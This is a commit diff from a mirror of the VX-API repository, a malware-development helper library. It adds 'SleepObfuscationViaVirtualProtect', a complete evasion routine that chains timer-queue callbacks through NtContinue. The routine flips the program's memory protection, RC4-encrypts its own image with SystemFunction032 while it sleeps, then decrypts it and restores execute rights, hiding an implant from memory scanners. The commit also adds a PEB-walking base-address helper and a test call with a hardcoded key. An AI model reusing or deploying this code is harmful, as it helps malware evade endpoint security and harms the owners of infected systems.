mirror of https://github.com/vxunderground/VX-API
parent
f107fe43a3
commit
d5ed074515
|
@ -20,3 +20,6 @@ x64/Debug/VX-API.exe
|
|||
*.xml
|
||||
*.sarif
|
||||
*.lastcodeanalysissucceeded
|
||||
*.iobj
|
||||
*.ipdb
|
||||
*.exe
|
||||
|
|
|
@ -80,6 +80,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| RemoveDllFromPeb | rad9800 | Evasion |
|
||||
| HookEngineRestoreHeapFree | rad9800 | Evasion |
|
||||
| HookEngineUnhookHeapFree | rad9800 | Evasion |
|
||||
| SleepObfuscationViaVirtualProtect | 5pider | Evasion |
|
||||
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
|
||||
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
|
||||
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
|
||||
|
@ -120,6 +121,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| IsRegistryKeyValid | smelly__vx | Helper Functions |
|
||||
| FastcallExecuteBinaryShellExecuteEx | smelly__vx | Helper Functions |
|
||||
| GetCurrentProcessIdFromOffset | RistBS | Helper Functions |
|
||||
| GetPeBaseAddress | smelly__vx | Helper Functions |
|
||||
| GetKUserSharedData | Geoff Chappell | Library Loading |
|
||||
| GetModuleHandleEx2 | smelly__vx | Library Loading |
|
||||
| GetPeb | 29a | Library Loading |
|
||||
|
|
|
@ -31,6 +31,7 @@ typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOL, PLARGE_INTEGER);
|
|||
typedef NTSTATUS(NTAPI* RTLQUEUEWORKITEM)(PRTL_WORK_ITEM_ROUTINE, PVOID, ULONG);
|
||||
typedef NTSTATUS(NTAPI* RTLREGISTERWAIT)(PHANDLE, HANDLE, WORKERCALLBACKFUNC, PVOID, ULONG, ULONG);
|
||||
typedef NTSTATUS(NTAPI* RTLDEREGISTERWAITEX)(HANDLE, HANDLE);
|
||||
typedef NTSTATUS(NTAPI* NTCONTINUE)(PCONTEXT, BOOL);
|
||||
|
||||
|
||||
|
||||
|
@ -60,4 +61,12 @@ typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
|||
/*******************************************
|
||||
SHELL32 IMPORT
|
||||
*******************************************/
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
ADVAPI32 IMPORT
|
||||
*******************************************/
|
||||
|
||||
typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
|
|
@ -0,0 +1,14 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HMODULE GetPeFileBaseAddress(VOID)
|
||||
{
|
||||
PPEB Peb = GetPebFromTeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
if (!Module)
|
||||
return NULL;
|
||||
|
||||
return (HMODULE)(Module->BaseAddress ? Module->BaseAddress : NULL);
|
||||
}
|
|
@ -3,7 +3,7 @@
|
|||
DWORD HashStringDjb2A(_In_ PCHAR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
INT c;
|
||||
INT c = 0;
|
||||
|
||||
while (c = *String++)
|
||||
Hash = ((Hash << 5) + Hash) + c;
|
||||
|
@ -14,7 +14,7 @@ DWORD HashStringDjb2A(_In_ PCHAR String)
|
|||
DWORD HashStringDjb2W(_In_ PWCHAR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
INT c;
|
||||
INT c = 0;
|
||||
|
||||
while (c = *String++)
|
||||
Hash = ((Hash << 5) + Hash) + c;
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
VOID HeapFreeInterceptionRoutine(PEXCEPTION_POINTERS ExceptionInfo)
|
||||
{
|
||||
CONST DWORD dwSize = HeapSize((HANDLE)ExceptionInfo->ContextRecord->Rcx, (DWORD)ExceptionInfo->ContextRecord->Rdx, (LPCVOID)ExceptionInfo->ContextRecord->R8);
|
||||
CONST DWORD dwSize = (DWORD)HeapSize((HANDLE)ExceptionInfo->ContextRecord->Rcx, (DWORD)ExceptionInfo->ContextRecord->Rdx, (LPCVOID)ExceptionInfo->ContextRecord->R8);
|
||||
|
||||
if (dwSize)
|
||||
ZeroMemoryEx((PVOID)ExceptionInfo->ContextRecord->R8, dwSize);
|
||||
|
|
|
@ -1126,3 +1126,8 @@ typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoS
|
|||
|
||||
typedef DWORD(CALLBACK* PRTL_WORK_ITEM_ROUTINE)(LPVOID);
|
||||
|
||||
typedef struct AMBIGUOUS_STRING {
|
||||
DWORD Length;
|
||||
DWORD MaximumLength;
|
||||
PUCHAR Buffer;
|
||||
}AB_STRING, * PAB_STRING;
|
||||
|
|
|
@ -37,8 +37,10 @@ int main(VOID)
|
|||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
|
||||
__demonstration_WinMain();
|
||||
|
||||
//hasha(NtMapViewOfSection);
|
||||
UCHAR KeyBuf[17] = { 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x00};
|
||||
|
||||
SleepObfuscationViaVirtualProtect(4000, KeyBuf);
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,142 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
|
||||
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
NTCONTINUE NtContinue = NULL;
|
||||
SYSTEMFUNCTION032 SystemFunction032 = NULL;
|
||||
HMODULE hNtdll = NULL, hAdvapi32 = NULL;
|
||||
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
|
||||
HMODULE ImageBaseAddress = NULL;
|
||||
|
||||
CONTEXT ContextThread = { 0 }, RopVirtualProtectReadWrite = { 0 }, RopSystemFunction032Encryption = { 0 }, RopWaitForSingleObject = { 0 };
|
||||
CONTEXT RopSystemFunction032Decryption = { 0 }, RopVirtualProtectExecute = { 0 }, RopSetEvent = { 0 };
|
||||
AB_STRING BinaryKey = { 0 }, ImageBuffer = { 0 };
|
||||
|
||||
HANDLE hTimer = NULL, hTimerQueue = NULL, hEvent = NULL;
|
||||
|
||||
DWORD PreviousProtectionAttribute = ERROR_SUCCESS;
|
||||
|
||||
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
if (hNtdll == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hAdvapi32 = TryLoadDllMultiMethodW((PWCHAR)L"cryptsp.dll");
|
||||
if (hAdvapi32 == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtContinue = (NTCONTINUE)GetProcAddressA((DWORD64)hNtdll, "NtContinue");
|
||||
SystemFunction032 = (SYSTEMFUNCTION032)GetProcAddressA((DWORD64)hAdvapi32, "SystemFunction032");
|
||||
|
||||
if (!NtContinue || !SystemFunction032)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ImageBaseAddress = GetPeFileBaseAddress();
|
||||
if (ImageBaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ImageBaseAddress);
|
||||
|
||||
hEvent = CreateEventW(0, 0, 0, 0);
|
||||
if (hEvent == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hTimerQueue = CreateTimerQueue();
|
||||
if (hTimerQueue == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BinaryKey.Buffer = Key;
|
||||
BinaryKey.Length = BinaryKey.MaximumLength = 17;
|
||||
|
||||
ImageBuffer.Buffer = (PUCHAR)ImageBaseAddress;
|
||||
ImageBuffer.Length = ImageBuffer.MaximumLength = Optional->SizeOfImage;
|
||||
|
||||
if (!CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)RtlCaptureContext, &ContextThread, 0, 0, WT_EXECUTEINTIMERTHREAD))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
WaitForSingleObject(hEvent, 0x32);
|
||||
|
||||
if (CopyMemoryEx(&RopVirtualProtectReadWrite, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopSystemFunction032Encryption, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopWaitForSingleObject, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopSystemFunction032Decryption, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopVirtualProtectExecute, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopSetEvent, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
// VirtualProtect
|
||||
RopVirtualProtectReadWrite.Rsp -= 8;
|
||||
RopVirtualProtectReadWrite.Rip = (DWORD64)VirtualProtect;
|
||||
RopVirtualProtectReadWrite.Rcx = (DWORD64)ImageBaseAddress;
|
||||
RopVirtualProtectReadWrite.Rdx = Optional->SizeOfImage;
|
||||
RopVirtualProtectReadWrite.R8 = PAGE_READWRITE;
|
||||
RopVirtualProtectReadWrite.R9 = (DWORD64)&PreviousProtectionAttribute;
|
||||
|
||||
// SystemFunction032
|
||||
RopSystemFunction032Encryption.Rsp -= 8;
|
||||
RopSystemFunction032Encryption.Rip = (DWORD64)SystemFunction032;
|
||||
RopSystemFunction032Encryption.Rcx = (DWORD64)&ImageBuffer;
|
||||
RopSystemFunction032Encryption.Rdx = (DWORD64)&BinaryKey;
|
||||
|
||||
// WaitForSingleObject
|
||||
RopWaitForSingleObject.Rsp -= 8;
|
||||
RopWaitForSingleObject.Rip = (DWORD64)WaitForSingleObject;
|
||||
RopWaitForSingleObject.Rcx = (DWORD64)InlineGetCurrentProcess;
|
||||
RopWaitForSingleObject.Rdx = dwSleepTimeInMilliseconds;
|
||||
|
||||
// SystemFunction032
|
||||
RopSystemFunction032Decryption.Rsp -= 8;
|
||||
RopSystemFunction032Decryption.Rip = (DWORD64)SystemFunction032;
|
||||
RopSystemFunction032Decryption.Rcx = (DWORD64)&ImageBuffer;
|
||||
RopSystemFunction032Decryption.Rdx = (DWORD64)&BinaryKey;
|
||||
|
||||
// VirtualProtect
|
||||
RopVirtualProtectExecute.Rsp -= 8;
|
||||
RopVirtualProtectExecute.Rip = (DWORD64)VirtualProtect;
|
||||
RopVirtualProtectExecute.Rcx = (DWORD64)ImageBaseAddress;
|
||||
RopVirtualProtectExecute.Rdx = Optional->SizeOfImage;
|
||||
RopVirtualProtectExecute.R8 = PAGE_EXECUTE_READWRITE;
|
||||
RopVirtualProtectExecute.R9 = (DWORD64)&PreviousProtectionAttribute;
|
||||
|
||||
// SetEvent
|
||||
RopSetEvent.Rsp -= 8;
|
||||
RopSetEvent.Rip = (DWORD64)SetEvent;
|
||||
RopSetEvent.Rcx = (DWORD64)hEvent;
|
||||
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopVirtualProtectReadWrite, 100, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSystemFunction032Encryption, 200, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopWaitForSingleObject, 300, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSystemFunction032Decryption, 400, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopVirtualProtectExecute, 500, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSetEvent, 600, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
|
||||
WaitForSingleObject(hEvent, INFINITE);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6031)
|
||||
if(hTimerQueue)
|
||||
DeleteTimerQueue(hTimerQueue);
|
||||
#pragma warning( pop )
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -104,7 +104,7 @@
|
|||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
<LanguageStandard>stdcpp20</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
|
@ -119,6 +119,7 @@
|
|||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp20</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
|
@ -181,6 +182,7 @@
|
|||
<ClCompile Include="GetOsMinorVersionFromPeb.cpp" />
|
||||
<ClCompile Include="GetOsPlatformIdFromPeb.cpp" />
|
||||
<ClCompile Include="GetPeb.cpp" />
|
||||
<ClCompile Include="GetPeFileBaseAddress.cpp" />
|
||||
<ClCompile Include="GetPidFromEnumProcesses.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQuerySystemInformation.cpp" />
|
||||
|
@ -244,6 +246,7 @@
|
|||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
<ClCompile Include="SetHardwareBreakpoint.cpp" />
|
||||
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
|
||||
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
|
||||
<ClCompile Include="SnapshotInsertHardwareBreakpointHookIntoTargetThread.cpp" />
|
||||
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
|
||||
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
|
||||
|
|
|
@ -513,6 +513,12 @@
|
|||
<ClCompile Include="HookEngineUnhookHeapFreecpp.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPeFileBaseAddress.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -15,6 +15,7 @@
|
|||
#include <icmpapi.h>
|
||||
#include <windns.h>
|
||||
#include <tlhelp32.h>
|
||||
#include <stdio.h>
|
||||
|
||||
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
|
@ -140,6 +141,13 @@ DWORD RtlNtStatusToDosErrorViaImport(_In_ NTSTATUS Status);
|
|||
/*******************************************
|
||||
CRYPTOGRAPHY RELATED
|
||||
*******************************************/
|
||||
//#define TOKENIZE( x ) #x
|
||||
//#define CONCAT3( X, Y, Z ) X##Y##Z
|
||||
//#define HASHALGOA HashStringDjb2A
|
||||
//#define hasha( VAL ) constexpr auto CONCAT3(hash,VAL,A) = HASHALGOA((PCHAR)TOKENIZE(VAL))
|
||||
//#define hashw( VAL ) constexpr auto CONCAT3(hash,VAL,W) = HASHALGOA((PWCHAR)TOKENIZE(VAL))
|
||||
|
||||
|
||||
DWORD HashStringDjb2A(_In_ PCHAR String);
|
||||
DWORD HashStringDjb2W(_In_ PWCHAR String);
|
||||
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String);
|
||||
|
@ -244,6 +252,7 @@ DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path);
|
|||
BOOL FastcallExecuteBinaryShellExecuteExW(_In_ PWCHAR FullPathToBinary, _In_ PWCHAR OptionalParameters);
|
||||
BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHAR OptionalParameters);
|
||||
DWORD GetCurrentProcessIdFromOffset(VOID);
|
||||
HMODULE GetPeFileBaseAddress(VOID);
|
||||
|
||||
|
||||
|
||||
|
@ -324,6 +333,7 @@ BOOL RemoveDllFromPebA(_In_ LPCSTR lpModuleName);
|
|||
BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
|
||||
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
|
||||
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
|
||||
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue